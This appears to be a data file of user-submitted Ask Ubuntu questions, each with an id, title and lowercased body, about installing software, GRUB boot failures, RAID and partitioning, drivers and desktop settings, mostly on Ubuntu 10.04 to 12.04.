120996	how do i install the latest version of okular ?	the version of okular on my ubuntu 10.10 is 0.11.2 , while the website shows the latest version to be 0.14 my question is - how do i get the latest version ? my update manager does not show any updates for okular although i dont know why . if there is a .deb package for okular 0.14 that i can install please let me know . i wish to avoid compiling it from source myself .
121006	problem with ajax in firefox browser	this is probably a very basic problem , but i am still at a basic skill level . i have started practicing with javascript and ajax recently . i use ubuntu on a virtual box virtual computer . i have a lamp installed on ubuntu . i use firefox . i have been following the ajax for dummies frameworks and examples . i have done some simple javascript text-display scripts and they work fine . however , when i tried an ajax script ( attempting to get data from a text file on the local host ) it does not work . the text does not appear in the browser with either `` onclick '' or `` onload '' . i downloaded and tested the example ajax for dummies script ( ch03/index.html ) and that also did not work . any answers or advice would be more appreciated than you will probably ever know . cheers guys , andrew
121008	server boots to grub prompt after reboot	ubuntu server 10.04.4 lts no other operating systems installed hardware raid ( 3ware 9650se ) single partition ( /dev/sda2 ) plus swap ( /dev/sda3 ) grub version : gnu grub 1.98-1ubuntu13 since applying a recent kernel update the server always boots to the grub prompt after a reboot . there 's no boot menu or error message - just a grub > prompt . i can boot the system as follows : set root= ( hd0,2 ) linux /vmlinuz root=/dev/sda2 ro initrd /initrd.img boot once it 's up , i 've tried doing update-grub but the problem does n't go away . i 've also tried grub-install -- recheck /dev/sda but it also does n't help . for some reason it always boots to the grub prompt . my /boot/grub/grub.cfg : # # do not edit this file # # it is automatically generated by /usr/sbin/grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then load_env fi set default= '' 0 '' if [ $ { prev_saved_entry } ] ; then set saved_entry= $ { prev_saved_entry } save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z $ { boot_once } ] ; then saved_entry= $ { chosen } save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n $ { have_grubenv } ] ; then if [ -z $ { boot_once } ] ; then save_env recordfail ; fi ; fi } insmod ext2 set root= ' ( hd0,2 ) ' search -- no-floppy -- fs-uuid -- set 1044722d-a8c7-4983-b6a4-f9faa3d4e79f if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=640x480 insmod gfxterm insmod vbe if terminal_output gfxterm ; then true ; else # for backward compatibility with versions of terminal.mod that don't # understand terminal_output terminal gfxterm fi fi insmod ext2 set root= ' ( hd0,2 ) ' search -- no-floppy -- fs-uuid -- set 1044722d-a8c7-4983-b6a4-f9faa3d4e79f set locale_dir= ( $ root ) /boot/grub/locale set lang=en insmod gettext if [ $ { recordfail } = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # menuentry 'ubuntu , with linux 2.6.32-40-server ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod ext2 set root= ' ( hd0,2 ) ' search -- no-floppy -- fs-uuid -- set 1044722d-a8c7-4983-b6a4-f9faa3d4e79f linux /boot/vmlinuz-2.6.32-40-server root=uuid=1044722d-a8c7-4983-b6a4-f9faa3d4e79f ro quiet initrd /boot/initrd.img-2.6.32-40-server } menuentry 'ubuntu , with linux 2.6.32-40-server ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod ext2 set root= ' ( hd0,2 ) ' search -- no-floppy -- fs-uuid -- set 1044722d-a8c7-4983-b6a4-f9faa3d4e79f echo 'loading linux 2.6.32-40-server ... ' linux /boot/vmlinuz-2.6.32-40-server root=uuid=1044722d-a8c7-4983-b6a4-f9faa3d4e79f ro single echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-2.6.32-40-server } menuentry 'ubuntu , with linux 2.6.32-33-server ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod ext2 set root= ' ( hd0,2 ) ' search -- no-floppy -- fs-uuid -- set 1044722d-a8c7-4983-b6a4-f9faa3d4e79f linux /boot/vmlinuz-2.6.32-33-server root=uuid=1044722d-a8c7-4983-b6a4-f9faa3d4e79f ro quiet initrd /boot/initrd.img-2.6.32-33-server } menuentry 'ubuntu , with linux 2.6.32-33-server ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod ext2 set root= ' ( hd0,2 ) ' search -- no-floppy -- fs-uuid -- set 1044722d-a8c7-4983-b6a4-f9faa3d4e79f echo 'loading linux 2.6.32-33-server ... ' linux /boot/vmlinuz-2.6.32-33-server root=uuid=1044722d-a8c7-4983-b6a4-f9faa3d4e79f ro single echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-2.6.32-33-server } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod ext2 set root= ' ( hd0,2 ) ' search -- no-floppy -- fs-uuid -- set 1044722d-a8c7-4983-b6a4-f9faa3d4e79f linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod ext2 set root= ' ( hd0,2 ) ' search -- no-floppy -- fs-uuid -- set 1044722d-a8c7-4983-b6a4-f9faa3d4e79f linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # if [ $ { timeout } ! = -1 ] ; then if keystatus ; then if keystatus -- shift ; then set timeout=-1 else set timeout=0 fi else if sleep -- interruptible 3 ; then set timeout=0 fi fi fi # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # i 've not knowingly edited files in /etc/grub.d or /etc/default/grub . i 've read lots of grub related posts these last few days and most seem to claim running update-grub will fix the problem but it has n't worked for me . also , i 'd like this not to happen next kernel update if possible . finally ; the server lives in a remote data centre - i have remote kvm access but getting it to boot off a live cd will be difficult so any solutions that do n't involve that are preferred . : - )
121011	update samba server	i just read that there is a big bug on the samba server . i checked the version and mine is 3.4.7 . i 'm using samba to share some data , how can i update the samba server under ubuntu 10.04 ?
121013	overlay on hdmi	will it ever be possible to overlay say ubuntu over a hdmi video feed so that when a button is pressed it will show the taksbar etc over the video that is playing . chumby 's netv does something similar ? we could make a really good multi room av system with this
121014	how do i list connected displays using the command line ?	is there a command that will list displays connected to the computer ? specifically , i 'm looking to find out how my external monitor is being detected by the system when connected by hdmi cable and what it 's ( not sure of the correct term here ) hardware address is ( eg . `` crt-0 '' or `` dfp-1 '' ) . this is just a general question , but for reference , i 'm using : asus ul30jt laptop - running ubuntu 12.04 beta and 11.10 asus pa238 23 '' monitor hdmi 1.4 cable optimus graphics ( intel + nvidia geforce 310m ) - running with bumblebee
121016	is any driver required for modern touchpads to function correctly ?	i was wondering why my touchpad does n't work well . i ca n't use it for scrolling up/down/sideways , which i would surely appreciate . it 's the touchpad of a `` hp pavilion g7 notebook ( the 1215sd ) '' .
121018	how to add a password to user account if previously it set to `` log in without password ''	i 'm using ubuntu 11.10 and some time ago i opened user accounts with administrator privilage and i made change as `` log in without password '' and now i want to add a password to my user account . but i can not unlock the user account dialog , because it is asking for password and if it left blank still it 's not opening ! please help me to solve my problem !
121020	upgrade from 9.04 to 11.10 or higher	many years ago i orderd ubuntu , i installed it and enjoyed it ( but i had to go over windows again ) . my dvd rom in not working anymore and i do n't have a 2gb usb stick . so here is my question . how can i update to latest ubuntu ? the update manager is not working , saying me some errors like : failed to fetch fetching the upgrade failed . there may be a network problem .
121022	unable to install ubuntu ( s ) on asus k53sm	i am unable to install any version of ubuntu . i tried ubuntu 11.04 , 11.10 and 12.04 beta . but the installation process terminates immediately after the splash screen , stating termination signal 9 . can someone please to guide me to solve this problem ? i have checked the downloaded iso file , its fine . i used the same iso file to create `` startup disk '' and installed ubuntu on another system .
121034	how to update mlt	i 've been experiencing multiple openshot crashes in every instance . more than 10 , on average per hour of usage . i 've googled it and i 've seen something about updating `` mlt '' . what is that ? and how can i update mlt ?
121041	can i access my ubuntu one account via ftp ?	can i access my ubuntu one account via ftp ? if so , how ? i want to use my backup script to send to my account on ubuntu one .
121046	running teamviewer or same kinda program on ubuntu 11.10	i have one more question . is there teamviewer available on linux ? or maybe there is another programme called just otherway ? or the only way to run tw is by wine ? 10x anyway -_-
121055	running garena on ubuntu 11.10	maybe i am boring , it 's third question already.. how to run garena on ubuntu 11.10 ? i started it via wine , configured it , and in the bottom of the monitor , when it 's starting , it 's written , garena is starting , and then nothing happens ... . it 's so pity , cause i am a professional dota player , i switched to linux yesterday at night . i am very pleased with the interface speed and such things but i ca n't get started my favourite programms here.. can any1 help me . thanks anyway again -_-
121056	ubuntu frontier dsl internet not working ?	i recently installed ubuntu 11.10 on an older computer pentium 4 dual 3.0 chips . ubuntu installed and runs great , but can not get the internet to work . will not recognize either the ethernet card , or the router . not sure which . any suggestions . ?
121062	kile doesn’t brings okular to front	as @ user49890 in emacs-auctex-okular i got an equal problem with kile and okular . in configured both for synctex and it works fine when okular is closed and kile quickbuilds the pdf , then okular is opened in front of kile . but if okular is already opened with the window behind kile’s window it stys hidden when kile says [ forwardpdf ] test.pdf ( okular ) is this a bug or did i made a wrong setting ( i’m using the predefined configurations of okular and kile , though ) . edit the problem remains wether i use okular’s -- unique option or not . and using viewpdf instead of forwardpdf makes no difference too .
121066	lenovo y460 heats up with ubuntu 11.10	i 'm new with ubuntu and i 'm enjoying my experience with ubuntu 11.10 on my lenovo ideapad y460 . i 'm dual booting ubuntu with windows 7 64 bit . it 's great using ubuntu , however i noticed that my laptop heats up rather quickly when i use ubuntu . does this have to do with drivers ? i have nvidia gt 425m graphics , but i do n't know if this information is relevant . my fans are just not working right as they do in windows 7 . did i miss installing something or what am i doing wrong ?
121068	raid shows up as multiple drives - ca n't mount	i have a single hard drive that the os is installed on and i have sil raid card installed with two matching 500gb hdds set up in raid 0 and formatted- they 're completely empty . for whatever reason they are showing up as /dev/sdb and /dev/sdc and not as a single hard drive . i used fdisk to format both raid drives as linux raid auto ( fd ) but i can not mount either device and dmraid does n't seem to want to work , what step am i missing ? when i installed 9.04 oh so long ago it seems like it recognized and automatically did everything that needed to be done , now i 'm stuck . dmraid output root @ tripoli : ~ # dmraid -r /dev/sdc : sil , `` sil_biaebhadcfcb '' , stripe , ok , 976771072 sectors , data @ 0 /dev/sdb : sil , `` sil_biaebhadcfcb '' , stripe , ok , 976771072 sectors , data @ 0 root @ tripoli : ~ # dmraid -ay raid set `` sil_biaebhadcfcb '' already active fdisk output root @ tripoli : ~ # fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000b9b01 device boot start end blocks id system /dev/sda1 * 1 32 248832 83 linux partition 1 does not end on cylinder boundary . /dev/sda2 32 60802 488134657 5 extended /dev/sda5 32 60802 488134656 8e linux lvm disk /dev/sdb : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x6ead5c9a device boot start end blocks id system /dev/sdb1 1 60801 488384001 fd linux raid autodetect disk /dev/sdc : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xe6e2af28 device boot start end blocks id system /dev/sdc1 1 60801 488384001 fd linux raid autodetect
121071	how to remove `` search and launch '' ?	is it possible to remove the `` search and launch '' whateveritis from my `` desktop '' ? i 've actually tried both desktop and netbook modes , but it stays there in both of them . i 'm not afraid of editing files in the ~/.kde dir , but i would be really disappointed if this is the only way to do it . [ more details/rants ] i was able to wipe out several things but i 've ended up with a black window that 's movable ( alt-click ) but not removable . beside being surprised by the performances , i find kubuntu extremely unfriendly , and i ca n't find the logic behind the items of the interface . i 've tried to search for documentation , but what i 've found is not updated and does n't include the netbook interface .
121072	ubuntu update error	i have a dell inspiron mini 10 using ubuntu which will not update - the error is < : e : /var/cache/apt/archives/linux-image-2.6.24-22-lpia_2.624-22.45netbook9_lpia.deb : files list file for package 'libxcb-shape0 ' is missing final newline > therefore can not use web browser - can anyone help - i am a novice i 'm afraidi
121073	why ~/.bash_profile is not getting sourced when opening a terminal ?	problem i have an ubuntu 11.04 virtual machine and i wanted to set up my java development environment . i did as follows sudo apt-get install openjdk-6-jdk added the following entries to ~/.bash_profile export java_home=/usr/lib/jvm/java-6-openjdk export path= $ path : $ java_home/bin save the changes and exit open up a terminal again and typed the following echo $ java_home ( blank ) echo $ path ( displayed , but not the java_home value ) nothing happened , like if the export of java_home and it 's addition to the path were never done . solution i had to go to ~/.bashrc and add the following entry towards the end of file # source bash_profile to set java_home and add it to the path because for some reason is not being picked up . ~/.bash_profile questions why did i have to do that ? i thought bash_profile , bash_login or profile in absence of those two get executed first before bashrc . was in this case my terminal a non-login shell ? if so , why when doing su after the terminal and putting the password it did not execute profile where i had also set the exports mentioned above ?
121076	remove ubuntu from computer or laptop	i have a laptop which uses ubuntu as operating system . ubuntu is fine but it does not support such applications like games , softwares and other things which are badly needed . so , i want to remove ubuntu and install windows xp . so , please explain me the process of removal of ubuntu . thanks .
121086	can not add movie file to pitivi	when i try adding this movie file to pitivi i get the following error ( i can play the file in mplayer just fine though ) : problem : an internal error occurred while analyzing this file : could not find gstreamer caps mapping for ffmpeg codec 'h264 ' , and you are using an external libavcodec . this is most likely due to a packaging problem and/or libavcodec having been upgraded to a version that is not compatible with this version of gstreamer-ffmpeg . make sure your gstreamer-ffmpeg and libavcodec packages come from the same source/repository . extra information : gstffmpegdec.c ( 1336 ) : gst_ffmpegdec_negotiate ( ) : /gstpipeline : discoverer-file : ///media/data/pitivi/taw2.mkv/gstdecodebin2 : dbin/ffdec_h264 : ffdec_h2645 also , my system language is english , but regional format is set to german . mplayer installed in german , i want it in english though ... thanks a lot for your help : ) i know i 'm a noob > . >
121090	how to switch from kubuntu to lubuntu	how can someone switch from kubuntu to ubuntu ? i need the os to be more lighter than kubuntu , so i need things to be unistalled from kubuntu and the lxde to be installed . i am talking about 11.10 . edit : i care alot if my system will be lightweight ! this pc is very old . ( 512 mb ram )
121094	how to uninstall suse linux	i am assuming the procedure is similar to ubuntus so someone help me uninstall suse linux enterprise 11 and installing windows 7.currently my notebook is running the linux only and am not interested in recovering any data
121095	where should a non-administrative user save a ca certificate ?	i have a ca certificate that i use to connect to a wpa2 enterprise wireless network . where within my home folder should i store the .crt file ? i do n't see anything in the filesystem hierarchy standard that suggests what i should do .
121100	shut down when asked without terminal help	my system has ubuntu 11.10 , and it will not shut down when asked to . it will reboot to the sign-in page . i have been using sudo shutdown -h now to shut down , but is it any way to put this into the program so ask to shutdown it will without going to terminal ?
121102	do i really need desktop sharing for one pc ?	i am running ubuntu 11.10 . i saw this thing about desktop sharing and saw what it was . i also read that it takes up a lot of the pc 's speed . i am only on this computer and that is all i have . do i really need this desktop sharing feature ? thanks .
121105	importing radiotray radio stations into banshee	i read this question and would like to know whether it was possible in a similar way for banshee also ? can i import radio stations i listen to in radiotray to banshee without adding them by hand ( which would take a long time ) ? i 've read the following ask ubuntu q & as : is it possible to import/export radio station as a list into/from banshee how to import a radio station list from rhythmbox to banshee ? these touch my question - but are slightly different . and without usable answers , at least in my case .
121106	how to change the default programs that are associated with every new user that is created ?	i am wondering how one would go about changing the default programs that are associated with every new user that is created . for example , firefox is the default browser for ubuntu 11.10 . in my user account i changed it so that google chrome is the default , and it appears in the launcher when i log in . but if i were to make another account for someone else the new user would have firefox as the default , and it would be in the launcher . how do i get google chrome to be in the launcher and the default browser for every new user that is made ? thanks in advance !
121107	pinning gnat to the version from ubuntu 5.10	i 'm running ubuntu 11.10 . i 'm installing gnat , but i want gnat 3.40 ( which came with ubuntu 5.10 ) , not the latest version . is it possible to get gnat 3.40 on an ubuntu 11.10 machine ? i thought about this solution : /etc/apt/preferences.d/gnat package : gnat pin : release v=5.10 , l=ubuntu pin-priority : 1001 package : gcc pin : release v=5.10 , l=ubuntu pin-priority : 1001 package : libc6 pin : release v=5.10 , l=ubuntu pin-priority : 1001 package : libc6-dev pin : release v=5.10 , l=ubuntu pin-priority : 1001 package : libgcc1 pin : release v=5.10 , l=ubuntu pin-priority : 1001 package : libgnat pin : release v=5.10 , l=ubuntu pin-priority : 1001 package : libgnatprj4.1 pin : release v=5.10 , l=ubuntu pin-priority : 1001 package : libgnatvsn4.1 pin : release v=5.10 , l=ubuntu pin-priority : 1001 or is this impossible ? maybe these version are too old to be compatible with ubuntu 11.10 ? or the changes are too extensive ?
121110	fdisk shows overlapping partitions	at every boot to start ubuntu , a partition gets re-mounted more than 1 times , sometimes causing very long boots . example below : > dmesg ... [ 21.472020 ] ext4-fs ( sda5 ) : re-mounted . opts : errors=remount-ro ... [ 42.021537 ] ext4-fs ( sda5 ) : re-mounted . opts : errors=remount-ro , commit=0 ... i suspect there is a problem of overlapping partitions here , regarding sda4 and sda5 : > sudo fdisk -l device boot start end blocks id system /dev/sda1 63 610469 305203+ de dell utility /dev/sda2 612352 32069631 15728640 7 hpfs/ntfs/exfat /dev/sda3 * 32069632 238979788 103455078+ 7 hpfs/ntfs/exfat /dev/sda4 238983166 625141759 193079297 5 extended /dev/sda5 238983168 612630527 186823680 83 linux /dev/sda6 612632576 625141759 6254592 82 linux swap / solaris further details : > more /etc/fstab ... # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda6 during installation uuid=b33be99b-5c9e-449e-ad48-be608aeff001 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda7 during installation uuid=7c9071cc-b77b-40da-9f80-6b8a9a220cb1 none swap sw and > mount /dev/sda5 on / type ext4 ( rw , errors=remount-ro , commit=0 ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) fusectl on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfs-fuse-daemon on /home/piero/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=piero ) i am running ubuntu oneiric + lxde on dell studio xps machine 64-bit , dual booting with windows 7 . a months ago , i resized the ubuntu partition and maybe i messed up something by doing that . do you have any idea , why this long booting is happening ?
121116	trying different flavors of ubuntu from a usb drive	is it possible to have a dual boot of different ubuntu versions ? x k l m e u since only 1 gig of space is recommended you should be able to have 8 possible version on a 16 gig flash drive . cause i really hate the scroll scroll bars in the unity version and want to see which system i like best xfce , kde , fluxbox custom ( is what my friend uses ) , etc . currently i have made 3 boot up drives all one usb drive which means erasing and reinstalling every time . cheers , ,
121122	display stays black after wakeup from suspend	i 'm using ubuntu 11.10 on a 305u1a samsung netbook with radeon hd 6320 graphics . after suspend , my display stays black . the fans are starting and the harddrive-indication-light is working as well , so the system is waking up . the backlight does n't wake up . i 'm searching for 3 days and trying out several manuals , but its still not working . thanks for your help !
121124	how do i enable the `` other '' user for login with active directory ?	so i work at a university using active directory , and in my office there are a few computers that i 've set up , in ubuntu 11.10 , to log as an ad user . in order to log in a person just needs to use the `` other '' user at login and use their university id and password . i 've installed 12.04lts on my personal computer , and i see that the `` other '' option no longer exists . if i upgrade those computers who need ad login capabilities , will they have them ?
121126	can i alt-tab windows from all workspaces ?	i put certain windows on certain spaces , but prefer alt-tab to switch between them . is there a toggle or other option to turn on the alt-tab from all workspaces in unity ?
121132	getting all the bugs associated with a user using launchpadlib	on each users launchpad homepage , there 's a tab entitled bugs . i 've been looking through the launchpad api reference for the person object but ca n't find anything that seems like it would return all the bugs associated with a particular user . have i just missed something or is there no easy way to use the api to do this ? if that 's the case , then how is launchpad going about compiling that list ?
121133	can i installl xerces 2.8 and 3.1 lib and dev , and easilly switch between them - maybe using update-alternatives ?	i work on two different projects that use the two different versions , and i 'd like to switch at will between them . when i try to install package 'libxerces-c-dev ' it wants to uninstall 'libxerces-c2-dev ' . how would i set up the two side-by-side using update-alternatives ?
121140	how do i make a custom ubuntu cd , using kde as the desktop interface ?	i would like to create _custom ubuntu cd by myself ... .please do n't redirect me to kubuntu ...
121145	changed the permission of bin to 700	i changed ( through chmod ) the permission of /bin to 770 . now , ubuntu does not boot . how do i fix this problem ?
121147	in kde , how can i restore my shortcut in quicklaunch applet ?	i lost my quicklaunch in kde and restored , but did not return the shortcuts , where can i change this ?
121159	help finding missing mumble-server dependencies	i 'm trying to install the mumble-server package using apt-get install mumble-server on ubuntu 11.10 server edition on rackspace cloud . problem is it ca n't find dependencies it should have found because they exist on launchpad.net ? dependencies message : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : mumble-server : depends : libavahi-compat-libdnssd1 ( > = 0.6.16 ) but it is not installable depends : libprotobuf7 but it is not installable depends : libqt4-dbus ( > = 4:4.5.3 ) but it is not installable depends : libqt4-network ( > = 4:4.5.3 ) but it is not installable depends : libqt4-sql ( > = 4:4.5.3 ) but it is not installable depends : libqt4-xml ( > = 4:4.5.3 ) but it is not installable depends : libqtcore4 ( > = 4:4.7.0~beta1 ) but it is not installable depends : libqt4-sql-sqlite but it is not installable e : unable to correct problems , you have held broken packages . any ideas on if i might be missing sources ? i 've been googling around and have n't found anyone else in this situation or anyone else not able to install the aforementioned packages . thanks for your time ! sources.list : deb http : //mirror.rackspace.com/ubuntu/ oneiric restricted deb-src http : //mirror.rackspace.com/ubuntu/ oneiric restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //mirror.rackspace.com/ubuntu/ oneiric-updates restricted deb-src http : //mirror.rackspace.com/ubuntu/ oneiric-updates restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //mirror.rackspace.com/ubuntu/ oneiric universe deb-src http : //mirror.rackspace.com/ubuntu/ oneiric universe deb http : //mirror.rackspace.com/ubuntu/ oneiric-updates universe deb-src http : //mirror.rackspace.com/ubuntu/ oneiric-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //mirror.rackspace.com/ubuntu/ oneiric multiverse deb-src http : //mirror.rackspace.com/ubuntu/ oneiric multiverse deb http : //mirror.rackspace.com/ubuntu/ oneiric-updates multiverse deb-src http : //mirror.rackspace.com/ubuntu/ oneiric-updates multiverse # # uncomment the following two lines to add software from the 'backports' # # repository . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # deb http : //us.archive.ubuntu.com/ubuntu/ oneiric-backports restricted universe multiverse # deb-src http : //us.archive.ubuntu.com/ubuntu/ oneiric-backports restricted universe multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . this software is not part of ubuntu , but is # # offered by canonical and the respective vendors as a service to ubuntu # # users . # deb http : //archive.canonical.com/ubuntu oneiric partner # deb-src http : //archive.canonical.com/ubuntu oneiric partner deb http : //security.ubuntu.com/ubuntu oneiric-security restricted deb-src http : //security.ubuntu.com/ubuntu oneiric-security restricted deb http : //security.ubuntu.com/ubuntu oneiric-security universe deb-src http : //security.ubuntu.com/ubuntu oneiric-security universe deb http : //security.ubuntu.com/ubuntu oneiric-security multiverse deb-src http : //security.ubuntu.com/ubuntu oneiric-security multiverse # cool kid webmin/usermin here brah deb http : //download.webmin.com/download/repository sarge contrib deb http : //webmin.mirror.somersettechsolutions.co.uk/repository sarge contrib
121160	/etc/init.d character encoding issue	i have a script in /etc/init.d on an ec2 image that , on machine startup , pulls in source code via svn , builds it , and then runs it using ant . the source code is java . within this code is a call to the weka library which writes a file to disk . on most ubuntu amis , and my home machines ' versions of ubuntu , there is no issue . the problem is that with certain versions/amis of ubuntu , unicode characters in the file are replaced with question marks ( ' ? ' ) . if i run the job manually on the trouble instance , unicode is output to file correctly , but not when run from /etc/init.d . what might be causing this problem and how can i fix it so that unicode characters appear correctly in files written from /etc/init.d processes ?
121165	get back ubuntu grub menu	i have a computer with multiple os 's , one of them is ubuntu ( others win7 , xp , vista ) , and recently i added opensuse to it . now when it boots the computer go to the opensuse grub menu . i would like to change it to the ubuntu grub menu that i had before this install . any idea how i can do it ? thanks , best regards .
121170	is it possible to boot without mounting /home ?	i want to backup my /home partition on /dev/sda6 using partclone , a command line utility . to do so , i first have to unmount the partition that i want to backup . most of the time , this is easy , but /home is used by so many processes that it ca n't be unmounted without first killing all those processes . so , the thing i 'm looking for is a way to boot ubuntu , without mounting /home , so i can back up the not-mounted /dev/sda6 partition . is that possible ? to be clear , it would be nice if this special boot could be 'one-time-only ' . so i 'm not looking for ways to change /etc/fstab in such way that /dev/sda6 wo n't be mounted . that 's because that would require me to change /etc/fstab twice each time just to make a backup . i 'm aware of the fact that there are other backup solutions available , such as deja-dup . i 'd like to use partclone , though .
121171	why boinc now on ubuntu 12.04 just run 2 tasks ?	i use to have when i have the computer turn on and was idle having more than 2 tasks running at same time.. but now this is not happens and it is enable at maximum of 2 tasks at same time , i don know why . also i was able 2 do that on ubuntu 11.10 not sure if is the same using boinc on ubuntu 11.10. so why this happens ? and how can i set up boinc 2 run more than just 2 tasks at same time in ubuntu 12.04 beta ?
121181	ubuntu vm can not start after kernel upgrade	several ubuntu 10.04 vms were restarted after few months and began getting `` kernel panic - not syncing : vfs : unable to mount root fs on unknown-block ( 0,0 ) '' message . restoring those vms from backup ( to the `` paused '' state ) allows to boot normally . however restarting the vm again results in the mentioned error message . i suspect it 's the updated kernel version ( 2.6.32-37-server , 2.6.32-38-server ) that misbehave - another ubuntu vm ( that 's used as template for those failing vms ) still has 2.6.32-24-server and reboots fine . we 're using hyperv ( 2008r2 ) as the server host . nothing were changed in it 's configuration . has anyone faced this issue , please advise the solution . many thanks in advance !
121185	how does the fglrx package 's version relate to amd 's version numbers , like catalyst 12.3 ?	when i learn about a new version of amd 's graphics driver , i usually see something like `` catalyst 12.3 . '' however , the fglrx package in ubuntu has a version like 2:8.960-0 . are these two version numbers related ? how can i find the ( better-known ) official version number , like 12.3 , for the fglrx package in ubuntu 's repository ? can i do this without needing to install the package ?
121186	can i automatically make my nvidia card 's fan quieter ?	i have a machine with an nvidia graphics card . unfortunately the gpu fan is very loud . it 's very annoying at times . we never use this machine for intense 3d work - that gpu is probably not working very hard at all . i 'm pretty sure i can run it at a much lower fan-speed without causing any problems . the nvclock utility can be used to manually adjust the fan-speed of my nvidia graphics card . i 'd like to call this utility automatically when the machine boots up . is there some kind of system service which i can use to automatically apply this kind of system-wide configuration ? even better , is there a system monitoring service which can poll the gpu temperature and adjust the various system fan-speeds accordingly ? thanks !
121195	empathy and pidgin can not connect to aim	i 'm on 11.10 and after an update last week i can no longer connect to aim with empathy or pidgin . i can connect with kopete so i know it 's not the aim account . i 've tried deselecting `` use clientlogin '' in pidgin and that made no difference . i 've uninstalled and re-installed both pidgin and empathy but that made no difference . does anyone have any other suggestions ?
121197	ubuntu installation partitioning : logical or primary ?	i am in the process of reinstalling ubuntu . when i got to this step : i was prompted to choose a logical or a primary partition . i 've never seen this dialog box before -- before it just told me to choose the mount point and the format . should i choose logical or primary ? the default is logical .
121200	installed ubuntu 11.10 64 alongside win 7 64 , now ubuntu wo n't start	two previous threads brought this up but both seem unresolved . i have a 64-bit windows 7 system and am looking to install 64-bit ubuntu as dual-boot . i have no experience with ubuntu or linux , this is a first time install . prior to install , i divided master hdd into two partitions ( one windows and one blank ntfs ) with 40gb reserved as unallocated for ubuntu install . i installed from cd , chose `` install alongside windows '' , the instructions for which stated i will have option to boot either os at startup . ubuntu seems to have created two partitions out of the unallocated space , and the installation process completed and prompted reboot . upon reboot ( and any subsequent attempts ) , computer automatically boots into windows , with no option to start ubuntu at all . upon reboot , f8 allows choice of hdd to boot from , but does not display multiple os to choose from . holding down shift and/or esc ( and also rapidly depressing either key ) at startup also had no effect . thanks in advance . been at this all day and at my wit 's end . if i ca n't get it working then i guess i 'll have to reformat the two partitions ubuntu installed on/created and try installing the 32-bit version . hardware is asus p5q-e mobo , bios ver 2101 , 8gb ram
